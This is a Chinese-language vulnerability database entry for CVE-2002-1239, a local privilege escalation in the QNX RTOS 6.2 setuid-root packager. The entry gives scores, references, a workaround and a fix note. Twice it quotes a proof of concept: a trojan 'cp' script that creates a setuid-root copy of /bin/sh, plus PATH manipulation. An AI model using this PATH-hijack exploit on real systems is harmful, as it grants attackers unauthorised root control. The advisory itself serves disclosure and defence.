CVE-2002-1239
CVSS7.2
发布时间 :2002-11-12 00:00:00
修订时间 :2016-10-17 22:25:08
NMCOES    

[原文]QNX Neutrino RTOS 6.2.0 uses the PATH environment variable to find and execute the cp program while operating at raised privileges, which allows local users to gain privileges by modifying the PATH to point to a malicious cp program.


[CNNVD]QNX RTOS应用程序packager执行外部程序路径不正确漏洞(CNNVD-200211-035)

        
        QNX RTOS是一款设计用于嵌入系统的实时操作系统,由QNX分发和维护。
        QNX中的packager应用程序执行外部应用程序时处理路径不正确,本地攻击者可以利用这个漏洞欺骗程序运行一个木马程序,导致获得ROOT SHELL控制整个系统。
        以setuid root属性安装的packager在执行外部应用程序时没有使用绝对路径,本地攻击者可以利用这个漏洞诱使packager执行一个恶意程序,而导致控制整个系统。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1239
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1239
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200211-035
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0066.html
(UNKNOWN)  VULNWATCH  20021108 iDEFENSE Security Advisory 11.08.02b: Non-Explicit Path Vulnerability in QNX Neutrino RTOS
http://marc.info/?l=bugtraq&m=103679043232178&w=2
(UNKNOWN)  BUGTRAQ  20021108 iDEFENSE Security Advisory 11.08.02b: Non-Explicit Path Vulnerability in QNX Neutrino RTOS
http://www.idefense.com/advisory/11.08.02b.txt
(VENDOR_ADVISORY)  MISC  http://www.idefense.com/advisory/11.08.02b.txt
http://www.iss.net/security_center/static/10564.php
(VENDOR_ADVISORY)  XF  qnx-rtos-gain-privileges(10564)
http://www.securityfocus.com/bid/6146
(UNKNOWN)  BID  6146

- 漏洞信息

QNX RTOS应用程序packager执行外部程序路径不正确漏洞
高危 环境条件错误
2002-11-12 00:00:00 2005-05-13 00:00:00
远程  
        
        QNX RTOS是一款设计用于嵌入系统的实时操作系统,由QNX分发和维护。
        QNX中的packager应用程序执行外部应用程序时处理路径不正确,本地攻击者可以利用这个漏洞欺骗程序运行一个木马程序,导致获得ROOT SHELL控制整个系统。
        以setuid root属性安装的packager在执行外部应用程序时没有使用绝对路径,本地攻击者可以利用这个漏洞诱使packager执行一个恶意程序,而导致控制整个系统。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 使用'chmod -s'命令去掉S位。
        厂商补丁:
        QNX
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        2003年1月提供的QNX RTOS 6.2.1将会修正这个问题。
        
        http://www.qnx.com/

- 漏洞信息 (22002)

QNX RTOS 6.2 Application Packager Non-Explicit Path Execution Vulnerability (EDBID:22002)
linux local
2002-11-08 Verified
0 Texonet
N/A [点击下载]
source: http://www.securityfocus.com/bid/6146/info

A vulnerability has been discovered in an application packager shipped with QNX RTOS. It should be noted that the vulnerable packager is installed setuid root by default.

It has been reported that the packager fails to use absolute paths to execute system commands. This could potentially allow an attacker to trick the program into running a trojaned binary.

Because the vulnerable packager is installed setuid root by default, this could allow a local attacker to take complete control over a system. 

$ cat > cp <<EOF
> #!/bin/sh
> /bin/cp /bin/sh /tmp/sh
> chmod 4755 /tmp/sh
> EOF
$ chmod 755 cp

The attacker then modifies the PATH environment variable to search
the current working directory before anything else:

$ PATH=$PWD:$PATH

The attacker now creates a directory and calls the packager on that
created directory:

$ mkdir temp
$ packager temp
...

The packager will ask a number of questions. When the procedure is
complete, a root shell will be waiting for the attacker:

$ ls -l /tmp/sh
- -rwsr-x r-x 1 root 100 153908 May 11 05:36 /tmp/sh 		

- 漏洞信息

12214
QNX Neutrino RTOS PATH Environment Variable Subversion Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2002-06-03 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

QNX RTOS Application Packager Non-Explicit Path Execution Vulnerability
Environment Error 6146
Yes No
2002-11-08 12:00:00 2009-07-11 06:07:00
Discovery credited to Texonet (http://www.texonet.com).

- 受影响的程序版本

QNX RTOS 6.2

- 漏洞讨论

A vulnerability has been discovered in an application packager shipped with QNX RTOS. It should be noted that the vulnerable packager is installed setuid root by default.

It has been reported that the packager fails to use absolute paths to execute system commands. This could potentially allow an attacker to trick the program into running a trojaned binary.

Because the vulnerable packager is installed setuid root by default, this could allow a local attacker to take complete control over a system.

- 漏洞利用

The following proof of concept has been supplied by iDEFENSE.

$ cat &gt; cp &lt;&lt;EOF
&gt; #!/bin/sh
&gt; /bin/cp /bin/sh /tmp/sh
&gt; chmod 4755 /tmp/sh
&gt; EOF
$ chmod 755 cp

The attacker then modifies the PATH environment variable to search
the current working directory before anything else:

$ PATH=$PWD:$PATH

The attacker now creates a directory and calls the packager on that
created directory:

$ mkdir temp
$ packager temp
...

The packager will ask a number of questions. When the procedure is
complete, a root shell will be waiting for the attacker:

$ ls -l /tmp/sh
- -rwsr-x r-x 1 root 100 153908 May 11 05:36 /tmp/sh

- 解决方案

This issue is said to be addressed in the upcoming QNX RTOS 6.2.1 which is expected to be released in January 2003. Concerned customers are advised to contact their QNX representative for information for obtaining a prerelease.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站